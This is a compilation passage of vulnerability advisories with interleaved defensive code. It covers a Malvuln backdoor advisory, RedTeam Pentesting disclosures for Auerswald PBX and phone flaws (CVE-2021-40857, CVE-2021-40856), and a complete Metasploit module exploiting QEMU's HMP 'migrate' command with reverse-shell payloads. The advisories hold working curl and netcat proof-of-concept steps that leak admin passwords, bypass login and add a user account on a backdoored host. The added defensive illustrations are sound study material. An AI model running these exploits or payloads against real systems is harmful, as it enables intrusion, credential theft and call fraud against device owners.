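    # commonpath, not startswith: "/opt/auerswald/moh2/x.wav" starts with the
    # base string but is not inside the base directory.
    if posixpath.commonpath([base_dir, candidate]) != base_dir or candidate == base_dir:
        return None
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return candidate
```

The advisory's two traversal requests (fileName=../../etc/passwd and ../../data/db/pbx4.db) normalise to paths outside the base directory and are refused, while the legitimate alarm1.wav and logo1.jpg requests resolve normally.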
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/9f11868c3beaa8e2c1f5c193f5888b85.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Small.er<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP port 5600. Third-party attackers who can reach infected systems can run any OS commands.<br />Type: PE32<br />MD5: 9f11868c3beaa8e2c1f5c193f5888b85<br />Vuln ID: MVID-2022-0480<br />Disclosure: 02/05/2022<br /><br />Exploit/PoC:<br />Note: hit enter twice for each command.<br /><br />nc64.exe x.x.x.x 5600<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\dump><br /><br />C:\dump><br />cd \Windows<br />C:\dump>cd \Windows<br /><br />C:\Windows><br />C:\Windows>whoami<br />whoami<br /><br />desktop-2c3jqho\victim<br /><br />C:\Windows><br /><br />C:\Windows><br />net user hyp3rlinx 666 /add<br />C:\Windows>net user hyp3rlinx 666 /add<br /><br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Advisory: Auerswald COMpact Privilege Escalation<br /><br /><br />RedTeam Pentesting discovered a vulnerability in the web-based<br />management interface of the Auerswald COMpact 5500R PBX which allows<br />low-privileged users to access passwords of administrative user accounts.<br /><br /><br />Details<br />=======<br /><br />Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")<br />Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))<br />Fixed Versions: 8.2B<br />Vulnerability Type: Privilege Escalation<br />Security Risk: high<br />Vendor URL: https://www.auerswald.de/en/product/compact-5500r<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005<br />Advisory Status: published<br />CVE: CVE-2021-40857<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857<br /><br /><br />Introduction<br />============<br /><br />"Fully modular VoIP appliance for more efficient communication processes<br />With the COMpact 5500R, you are originally equipped for everyday<br />business - now and in the future.<br /><br />The fully modular architecture with 80 IP channels and all the functions<br />of a large ITC server allows up to 112 subscribers and thus scales with<br />your company.<br /><br />Continuous maintenance and expansion of the system software makes this<br />versatile IP server a future-proof investment in any business<br />communication."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />Attackers with low-privileged user accounts, for example those that are<br />used by VoIP phones, can log into the web-based management interface of<br />the COMpact 5500R PBX. 
Afterwards, the list of user accounts can be<br />listed and details shown for each user account. Adding the URL parameter<br />"passwd=1" then also includes the clear text password for each user<br />account, including administrative ones, which can then be used to<br />authenticate against the management interface.<br /><br /><br />Proof of Concept<br />================<br /><br />The command-line HTTP client curl[1] can be used as follows to log in<br />with the username "123" and the password "secret" (shortened and<br />formatted to increase readability):<br /><br />------------------------------------------------------------------------<br />$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/<br />[...]<br /><br />[<br /> {<br /> "login": 1,<br /> "userId": 1234,<br /> "userRufNr": "123",<br /> "userName": "123",<br /> "pbxType": 35,<br /> "pbxId": 0,<br /> "pbx": "COMpact 5500R",<br /> "pbxEdit": "Comp.5500R",<br /> "isActivated": 1,<br /> "dongleTnCount": 112,<br /> "currentConfig": 34,<br /> "cur": "EUR",<br /> "language": 0,<br /> "hidePrivat": 1,<br /> "offlineConfig": false<br /> },<br /> [...]<br />]<br />------------------------------------------------------------------------<br /><br />The server returns a JSON document describing the user account as well<br />as a session ID in a cookie. This session ID can then be used to access<br />other API endpoints on the PBX. 
The following listing shows the request to<br />the path "/logstatus_state", which returns the current access level:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Teilnehmer"}<br />------------------------------------------------------------------------<br /><br />The access level in this case is "Teilnehmer" (member).<br /><br />The list of all other users can be requested as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> https://192.168.1.2/cfg_data_teilnehmer<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />[<br />[...]<br />{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},<br />[...]<br />{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}<br />[...]<br />]<br />------------------------------------------------------------------------<br /><br />Two user accounts are shown in the listing above: the current user's<br />account with the ID 1234 and a different user account with so-called<br />"sub-admin" privileges with the ID 2222.<br /><br />Details about a particular user account with a given ID can be requested<br />like this:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"rufnr":"123","name":"Example User",[...],<br />"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",<br />[...], 
"isSubadmin":0,[...]}<br />------------------------------------------------------------------------<br /><br />In the returned JSON document, the values of the fields for the PIN,<br />token and password are replaced by "XXX". But if the URL parameter<br />"passwd" is set to the value 1, the values are returned in plain text:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"rufnr":"123","name":"Example User",[...],<br />"privatPin":"12345678","privatPass":"secretpassword",<br />"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}<br />------------------------------------------------------------------------<br /><br />This can be repeated for other user accounts, for example for the<br />user account with the ID 2222 shown it the listing earlier. 
The server<br />returns the plain text password for the other user account:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",<br />"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",<br />[...],"isSubadmin":1,[...]}<br />------------------------------------------------------------------------<br /><br />The password can then be used to log into the PBX with the other user<br />account:<br /><br />------------------------------------------------------------------------<br />$ curl --anyauth --user sub-admin:verysecretpassword --include \<br /> https://192.168.1.2/tree<br /><br />[...]<br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/<br />[...]<br /><br />[{"login":2,"userId":2222,[...]}]<br />------------------------------------------------------------------------<br /><br />Checking the access level with the new session ID shows that the user is<br />now logged in with an administrative account:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Sub-Administrator"}<br />------------------------------------------------------------------------<br /><br /><br />Workaround<br />==========<br /><br />Disable or restrict access to the web-based management interface if<br />possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version 
which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />Attackers who have acquired access to a low-privileged user account, for<br />example by extracting such an account from a VoIP phone, can log into<br />the web-based management interface of the COMpact 5500R PBX and access<br />clear text passwords for other user accounts, including those with the<br />"sub-admin" privilege. After logging in with these newly acquired<br />credentials, attackers can access configuration settings and most other<br />functions.<br /><br />They can then for example create new SIP credentials and use them to<br />call premium rate phone lines they operate to generate revenue. They can<br />monitor and even redirect all incoming and outgoing phone calls and<br />record all Ethernet data traffic.<br /><br />Due to the severe and far-reaching consequences and despite the<br />prerequisite of having to know an existing low-privilege user account,<br />this vulnerability is rated as a high risk.<br /><br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-05 Vendor provides access to device with fixed firmware<br />2021-10-11 Vendor provides fixed firmware<br />2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-12-06 Advisory published<br /><br /><br />References<br />==========<br /><br />[1] https://curl.se/<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. 
Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
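The "passwd" parameter handling described in the advisory above, as an added illustration that is not Auerswald's firmware code: the first handler reproduces the defect (the URL parameter alone decides whether secrets come back in plain text), the second honours it only for an administrative session and records each disclosure. Field names and access levels are those in the listings above; the profile store, the session model and the audit log are constructed assumptions.

```python
"""Redaction of credential fields in the user-profile endpoint.

Added illustration for the COMpact advisory above, not Auerswald's firmware
code. Field names (rufnr, privatPin, privatPass, privatToken, isSubadmin)
and access levels (Teilnehmer, Sub-Administrator, Administrator) are taken
from the advisory; the profile store, session model and audit log are
constructed assumptions.
"""
from urllib.parse import parse_qs, urlsplit

SECRET_FIELDS = ("privatPin", "privatPass", "privatToken")
ADMIN_LEVELS = {"Sub-Administrator", "Administrator"}

# Constructed profile store keyed by tnId; values mirror the advisory's listings.
PROFILES = {
    1234: {"rufnr": "123", "name": "Example User", "privatPin": "12345678",
           "privatPass": "secretpassword", "privatToken": "yyyyyyyyyyyyy",
           "isSubadmin": 0},
    2222: {"rufnr": "555", "name": "sub-admin other user", "privatPin": "99999999",
           "privatPass": "verysecretpassword", "privatToken": "zzzzzzzzzz",
           "isSubadmin": 1},
}

AUDIT_LOG = []  # constructed: one entry per disclosure of plain-text secrets


def redact(profile):
    """Return a copy with every secret field masked, as the PBX does by default."""
    out = dict(profile)
    for field in SECRET_FIELDS:
        if field in out:
            out[field] = "X" * len(str(out[field]))
    return out


def _parse(url):
    """Extract tnId and the passwd flag from a request like the advisory's."""
    query = parse_qs(urlsplit(url).query)
    tn_id = int(query["tnId"][0])
    want_plain = query.get("passwd", ["0"])[0] == "1"
    return tn_id, want_plain


def profile_vulnerable(url, session_level):
    """Behaviour described in the advisory: the URL parameter alone decides.

    session_level is accepted but never consulted, which is the defect.
    """
    tn_id, want_plain = _parse(url)
    profile = PROFILES[tn_id]
    return dict(profile) if want_plain else redact(profile)


def profile_hardened(url, session_level):
    """Only an administrative session may request plain-text secrets.

    A "Teilnehmer" (member) session gets the masked document regardless of
    the parameter, and every plain-text disclosure is written to the audit
    log so that misuse of an administrative session remains traceable.
    """
    tn_id, want_plain = _parse(url)
    profile = PROFILES[tn_id]
    if want_plain and session_level in ADMIN_LEVELS:
        AUDIT_LOG.append({"level": session_level, "tnId": tn_id, "plain": True})
        return dict(profile)
    return redact(profile)


if __name__ == "__main__":
    url = "/teilnehmer_profil_einzel_state?tnId=2222&passwd=1"
    print("vulnerable, Teilnehmer   :", profile_vulnerable(url, "Teilnehmer")["privatPass"])
    print("hardened,   Teilnehmer   :", profile_hardened(url, "Teilnehmer")["privatPass"])
    print("hardened,   Administrator:", profile_hardened(url, "Administrator")["privatPass"])
```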
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => "QEMU Monitor HMP 'migrate' Command Execution",<br /> 'Description' => %q{<br /> This module uses QEMU's Monitor Human Monitor Interface (HMP)<br /> TCP server to execute system commands using the `migrate` command.<br /><br /> This module has been tested successfully on QEMU version 6.2.0<br /> on Ubuntu 20.04.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['bcoles'],<br /> 'References' => [<br /> ['URL', 'https://wiki.qemu.org/ToDo/HMP'],<br /> ['URL', 'https://www.qemu.org/docs/master/system/monitor.html'],<br /> ['URL', 'https://www.qemu.org/docs/master/system/security.html'],<br /> ['URL', 'https://www.linux-kvm.org/page/Migration'],<br /> ],<br /> 'Arch' => [ ARCH_CMD, ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],<br /> 'Platform' => %w[unix linux],<br /> 'Payload' => {<br /> 'DisableNops' => true,<br /> 'BadChars' => "\x00\x0a\x0d\x22",<br /> 'Space' => 1010<br /> },<br /> 'Targets' => [<br /> [<br /> 'Unix (Command)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux (Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',<br /> 'PrependFork' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 
'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> },<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2011-12-02'<br /> )<br /> )<br /> end<br /><br /> def read_until_prompt<br /> ::Timeout.timeout(10) do<br /> loop do<br /> res = sock.get_once<br /> break if res.nil?<br /> break if res.to_s.include?('(qemu)')<br /> end<br /> end<br /> end<br /><br /> def check<br /> connect<br /> banner = sock.get_once.to_s<br /> disconnect<br /><br /> unless banner.include?('QEMU') && banner.include?('monitor')<br /> return CheckCode::Safe('Service is not QEMU monitor HMP.')<br /> end<br /><br /> CheckCode::Appears('QEMU monitor HMP service is running.')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> cmd = cmd.gsub('\\', '\\\\\\')<br /> vprint_status("Executing command: #{cmd}")<br /> sock.put("migrate -d \"exec:#{cmd}\"\n")<br /> read_until_prompt<br /> end<br /><br /> def exploit<br /> connect<br /> read_until_prompt<br /><br /> print_status "Sending payload (#{payload.encoded.length} bytes) ..."<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager(linemax: 1010, background: true)<br /> end<br /> ensure<br /> disconnect unless sock.nil?<br /> end<br />end<br /></code></pre>
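A defensive counterpart to the module above, added here and not part of Metasploit or QEMU: the `migrate` HMP command is available to anyone who can connect to the monitor, so the audit below parses QEMU command lines (a constructed `ps -eo pid,args` excerpt is embedded) and reports where each monitor or QMP endpoint listens. Option syntax follows QEMU's `-monitor`, `-qmp`, `-chardev` and `-mon` documentation; the risk labels are this example's own convention.

```python
"""Audit running QEMU command lines for monitor endpoints exposed over TCP.

Added example for the module above, not part of Metasploit or QEMU. Input
is the output of `ps -eo pid,args` (a constructed sample is embedded).
Option syntax follows QEMU's -monitor/-qmp/-chardev/-mon documentation; the
risk labels (high/medium/low/info) are this example's own convention.
"""
import shlex

# Constructed `ps -eo pid,args` excerpt: five guests with different monitor setups.
SAMPLE_PS = """\
 1201 qemu-system-x86_64 -name vm1 -monitor tcp:0.0.0.0:4444,server,nowait -drive file=vm1.qcow2
 1202 qemu-system-x86_64 -name vm2 -monitor unix:/run/qemu/vm2.mon,server,nowait
 1203 qemu-system-x86_64 -name vm3 -chardev socket,id=mon0,host=127.0.0.1,port=5555,server=on,wait=off -mon chardev=mon0,mode=readline
 1204 qemu-system-x86_64 -name vm4 -qmp tcp::4445,server,nowait -nographic
 1205 qemu-system-x86_64 -name vm5 -monitor stdio
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}


def classify_spec(spec):
    """Map a -monitor/-qmp chardev spec to (transport, bind, risk)."""
    if spec.startswith("tcp:"):
        hostport = spec[4:].split(",")[0]           # "host:port" before any options
        host, _, _port = hostport.rpartition(":")
        if host in LOOPBACK:
            return ("tcp", host, "medium")         # any local user can connect
        # An empty host means all interfaces (QEMU's default for tcp: servers).
        return ("tcp", host or "0.0.0.0", "high")  # reachable from the network
    if spec.startswith("unix:"):
        return ("unix", spec[5:].split(",")[0], "low")  # socket file permissions apply
    return ("local", spec.split(",")[0], "info")        # stdio, vc, none, ...


def classify_chardev(opts):
    """Same for a -chardev socket,... definition given as key=value pairs."""
    if "path" in opts:
        return ("unix", opts["path"], "low")
    if "port" in opts:
        host = opts.get("host", "0.0.0.0")
        return ("tcp", host, "medium" if host in LOOPBACK else "high")
    return ("local", opts.get("backend", "?"), "info")


def _kv(text):
    """Parse 'a=1,b=2' into a dict, ignoring bare flags."""
    return dict(kv.split("=", 1) for kv in text.split(",") if "=" in kv)


def audit_ps(ps_text):
    """Return one finding per monitor endpoint: (pid, option, transport, bind, risk)."""
    findings = []
    for line in ps_text.splitlines():
        pid, _, cmdline = line.strip().partition(" ")
        if "qemu" not in cmdline:
            continue
        argv = shlex.split(cmdline)
        chardevs = {}
        for i, arg in enumerate(argv[:-1]):          # first pass: named chardevs
            if arg == "-chardev":
                backend, _, rest = argv[i + 1].partition(",")
                opts = _kv(rest)
                opts["backend"] = backend
                chardevs[opts.get("id")] = opts
        for i, arg in enumerate(argv[:-1]):          # second pass: monitor options
            if arg in ("-monitor", "-qmp"):
                findings.append((int(pid), arg) + classify_spec(argv[i + 1]))
            elif arg == "-mon":
                dev = chardevs.get(_kv(argv[i + 1]).get("chardev"), {})
                findings.append((int(pid), arg) + classify_chardev(dev))
    return findings


def exposed(ps_text):
    """Only the findings that warrant action: monitors bound to a network address."""
    return [f for f in audit_ps(ps_text) if f[4] == "high"]


if __name__ == "__main__":
    for finding in audit_ps(SAMPLE_PS):
        print(finding)
```

Run it against real `ps -eo pid,args` output; a "high" finding means the HMP or QMP socket is reachable by anything that can open a TCP connection to that host, which is exactly the precondition the module relies on.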
<pre><code>Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass<br /><br /><br />RedTeam Pentesting discovered a vulnerability in the web-based<br />configuration management interface of the Auerswald COMfortel 1400 and<br />2600 IP desktop phones. The vulnerability allows accessing configuration<br />data and settings in the web-based management interface without<br />authentication.<br /><br /><br />Details<br />=======<br /><br />Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP<br />Affected Versions: <= 2.8F<br />Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)<br />Vulnerability Type: Authentication Bypass<br />Security Risk: high<br />Vendor URL: https://www.auerswald.de<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004<br />Advisory Status: published<br />CVE: CVE-2021-40856<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856<br /><br /><br />Introduction<br />============<br /><br />"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and<br />IP system phone), with 4.3" colour touch display and preconfigured<br />answering machine"<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />During a penetration test it was discovered that several VoIP phones<br />(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow<br />accessing administrative functions without login credentials, bypassing<br />the authentication. This can be achieved by simply prefixing API<br />endpoints that require authentication with "/about/../", since the<br />"/about" endpoint does not require any authentication.<br /><br /><br />Proof of Concept<br />================<br /><br />The phones run a web-based management interface on Port 80. 
If accessed,<br />the HTTP response code 401 together with a website redirecting to the<br />path "/statics/pageChallenge.html" is returned. This can for example be<br />seen using the command-line HTTP client curl[1] as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --include 'http://192.168.1.190/'<br />HTTP/1.1 401 Unauthorized<br />[...]<br /><br /><!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;<br />URL=/statics/pageChallenge.html'></head><body></body></html><br />------------------------------------------------------------------------<br /><br />The website contains JavaScript code that requests the path<br />"/about?action=get" and loads a JSON document (formatted and shortened<br />to increase readability):<br /><br />------------------------------------------------------------------------<br />$ curl --include 'http://192.168.1.190/about?action=get'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 3673<br />Date: Mon, 30 Aug 2021 08:39:24 GMT<br />Server: lighttpd<br /><br />{<br /> "DATA": {<br /> "firmware": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "2.8E",<br /> "KEY": "firmware"<br /> },<br /> "serial": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "1234567890",<br /> "KEY": "serial"<br /> },<br /> [...]<br /> }<br />}<br /><br />------------------------------------------------------------------------<br /><br />Among other information, this JSON document contains the serial number<br />and firmware version displayed on the website. This action can be<br />accessed without authentication. 
Other endpoints require authentication,<br />for example the path "/tree?action=get", from which the menu structure<br />is loaded after successful authentication:<br /><br />------------------------------------------------------------------------<br />$ curl --include 'http://192.168.1.190/tree?action=get'<br />HTTP/1.1 401 Unauthorized<br />[...]<br /><br /><!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;<br />URL=/statics/pageChallenge.html'></head><body></body></html><br />------------------------------------------------------------------------<br /><br />During the penetration test, it was discovered that this action can<br />successfully be requested by inserting the prefix "/about/../". In order<br />to prevent curl from normalizing the URL path, the option "--path-as-is"<br />must be supplied:<br /><br />------------------------------------------------------------------------<br />$ curl --include --path-as-is \<br /> 'http://192.168.1.190/about/../tree?action=get'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 3808<br />Date: Mon, 30 Aug 2021 08:42:11 GMT<br />Server: lighttpd<br /><br />{<br /> "TYPE": "TREENODEPAGE",<br /> "ITEMS": {<br /> "COUNT": 2,<br /> "TYPE": "ITEMLIST",<br /> "1": {<br /> "id": 31,<br /> "text": "applications_settings",<br /> "TYPE": "TREENODEPAGE",<br /> "ITEMS": {<br /> "COUNT": 1,<br /> "TYPE": "ITEMLIST",<br /> "0": {<br /> "target": "pageFunctionkeys.html",<br /> "id": 32,<br /> "action": "/functionkeys",<br /> "text": "key_app",<br /> "pagename": "Functionkeys",<br /> "TYPE": "TREENODEPAGE"<br /> }<br /> }<br /> },<br /> [...]<br /> }<br />}<br />------------------------------------------------------------------------<br /><br />The endpoint "/account" allows listing account data:<br /><br />------------------------------------------------------------------------<br />$ curl --include --path-as-is \<br /> 
'http://192.168.1.190/about/../account?action=list'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 793<br />Date: Mon, 30 Aug 2021 08:43:33 GMT<br />Server: lighttpd<br /><br />{<br /> "DATA": {<br /> [...]<br /> "accountList0": {<br /> "KEY": "accountList0",<br /> "COUNT": 1,<br /> "TYPE": "DATAMODEL",<br /> "VALUE": {<br /> "0": {<br /> "ID": 32327,<br /> "PARENTID": 0,<br /> "PROVIDER": "ProviderName",<br /> "NAME": "123 Example User",<br /> "STATUS": 4,<br /> "DEFAULT": 1<br /> }<br /> },<br /> [...]<br /> },<br /> }<br />}<br />------------------------------------------------------------------------<br /><br />The ID 32327 can then be used to get details about that particular<br />account, including the username and password:<br /><br />------------------------------------------------------------------------<br />$ curl --include --path-as-is \<br /> 'http://192.168.1.190/about/../account?action=get&itemID=32327'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 2026<br />Date: Mon, 30 Aug 2021 08:44:13 GMT<br />Server: lighttpd<br /><br />{<br /> "DATA": {<br /> [...]<br /> "Benutzer": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "123",<br /> "KEY": "Benutzer"<br /> },<br /> "Passwort": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "secret",<br /> "KEY": "Passwort"<br /> },<br /> [...]<br /> }<br />}<br />------------------------------------------------------------------------<br /><br />Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to<br />access and use the web-based management interface as if regular login<br />credentials were presented.<br /><br />It is likely that other functionality can be accessed in the same way,<br />to for example change settings or activate the integrated option for<br />recording the Ethernet traffic.<br /><br /><br />Workaround<br />==========<br /><br 
/>Disable the web-based management interface if possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />Inserting the prefix "/about/../" allows bypassing the authentication<br />check for the web-based configuration management interface. This enables<br />attackers to gain access to the login credentials used for<br />authentication at the PBX, among other data.<br /><br />Attackers can then authenticate at the PBX as the respective phone and<br />for example call premium rate phone lines they operate to generate<br />revenue. They can also configure a device they control as the PBX in the<br />phone, so all incoming and outgoing phone calls are intercepted and can<br />be recorded. The device also contains a function to record all Ethernet<br />data traffic, which is likely affected as well.<br /><br />Overall, the vulnerability completely bypasses the authentication for<br />the web-based management interface and therefore poses a high risk.<br /><br /><br />References<br />==========<br /><br />[1] https://curl.se<br />[2] https://github.com/zaproxy/zaproxy/<br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-04 Vendor provides access to device with fixed firmware<br />2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-10-14 Vendor releases corrected firmware version 2.8G<br />2021-12-06 Advisory published<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. 
Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
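The authentication check the advisory above describes, as an added illustration rather than the phone's or lighttpd's code: the vulnerable variant applies the exemption for "/about" to the raw request path, so "/about/../tree" slips through, while the hardened variant percent-decodes and collapses dot segments before deciding. A detection over a constructed access-log excerpt flags any request whose raw path differs from its canonical form. Endpoint names come from the advisory; the exemption rule and the log lines are assumptions.

```python
"""Authorisation on the raw versus the normalised request path.

Added illustration for the COMfortel advisory above, not the phone's or
lighttpd's code. Endpoint names ("/about", "/tree", "/account",
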